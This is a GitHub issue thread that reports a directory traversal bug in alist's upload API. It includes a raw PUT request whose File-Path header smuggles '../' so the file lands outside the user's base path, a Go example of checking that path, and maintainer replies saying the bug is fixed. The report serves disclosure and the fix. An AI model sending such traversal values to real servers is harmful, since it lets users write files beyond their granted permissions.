Directory traversal file upload vulnerability #2449

Closed
4 tasks done
Shydlock opened this issue Nov 22, 2022 · 4 comments
Labels: bug (Something isn't working)

Shydlock commented Nov 22, 2022

Please make sure of the following things

  • I have read the documentation.
  • I'm sure there are no duplicate issues or discussions.
  • I'm sure it's due to alist and not something else (such as Dependencies or Operational).
  • I'm sure I'm using the latest version

Alist Version

v3.4.0 (It seems like this problem still exists in version 3.5.1)

Driver used

Local

Describe the bug

  • A user with only file upload permission can bypass the base path restriction by using '../' and upload files to an arbitrary path

  • I created a user 'test' with file upload permission only and set its base path to '/test'

  • My file directory structure is as follows

  • Log in as 'test' and find that I am already in '/test'

  • Then try to upload a file, capture the packet and modify the 'File-path' parameter with '../'

  • Send the packet, and log in as 'admin' to check '/testPasswd'. You will find that the file has been uploaded successfully.

Reproduction

Packet:
PUT /api/fs/put HTTP/1.1
Host: 192.168.31.148:52000
Content-Length: 30530
Accept: application/json, text/plain, */*
As-Task: false
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyOTQ4NTMsIm5iZiI6MTY2OTEyMjA1MywiaWF0IjoxNjY5MTIyMDUzfQ.DwnVRyCGUZ0Cx2B7s6kCqvrg_-rzQ7hf5tbbsy4RSVc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
File-Path: ..%2ftestPasswd%2ftestDirectoryTraversal
Content-Type: application/octet-stream
Origin: http://192.168.31.148:52000
Referer: http://192.168.31.148:52000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

\x89PNG

Logs

None
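
One way to enforce a per-user base path against the File-Path value in this report, as an added example (not alist's code and not the change in the commit referenced later in the thread). It assumes the server URL-decodes the header and joins it to the user's base path; `naiveJoin` and `resolveUserPath` are hypothetical names.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"path"
	"strings"
)

// ErrOutsideBase is returned when the requested path leaves the user's base path.
var ErrOutsideBase = errors.New("path escapes user base path")

// naiveJoin shows the failure mode from the report: the decoded header is
// joined to the base path and cleaned, so ".." segments walk out of the base.
func naiveJoin(basePath, rawHeader string) (string, error) {
	decoded, err := url.PathUnescape(rawHeader)
	if err != nil {
		return "", err
	}
	return path.Join(basePath, decoded), nil
}

// resolveUserPath (hypothetical helper) decodes the header, joins it to the
// base path, then verifies the cleaned result is still the base or below it.
func resolveUserPath(basePath, rawHeader string) (string, error) {
	decoded, err := url.PathUnescape(rawHeader)
	if err != nil {
		return "", err
	}
	// Normalise backslashes so "..\" is treated as a parent segment as well.
	decoded = strings.ReplaceAll(decoded, "\\", "/")
	base := path.Clean("/" + basePath)
	full := path.Join(base, decoded)
	// Compare on a segment boundary: "/test" must not match "/testPasswd".
	if full != base && !strings.HasPrefix(full, strings.TrimSuffix(base, "/")+"/") {
		return "", ErrOutsideBase
	}
	return full, nil
}

func main() {
	header := "..%2ftestPasswd%2ftestDirectoryTraversal" // File-Path value from the report
	p, _ := naiveJoin("/test", header)
	fmt.Println("naive:  ", p)
	_, err := resolveUserPath("/test", header)
	fmt.Println("checked:", err)
}
```

A plain string-prefix test against '/test' would accept '/testPasswd/...', which is why the comparison appends the separator first.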

Shydlock added the bug label Nov 22, 2022

Shydlock (Author) commented

It seems like this problem still exists in version 3.5.1

BoYanZh (Contributor) commented Nov 30, 2022

It should have been fixed in b5bf5f4.

xhofe closed this as completed Dec 9, 2022

Chestnuts4 commented

It can only upload PNG files?
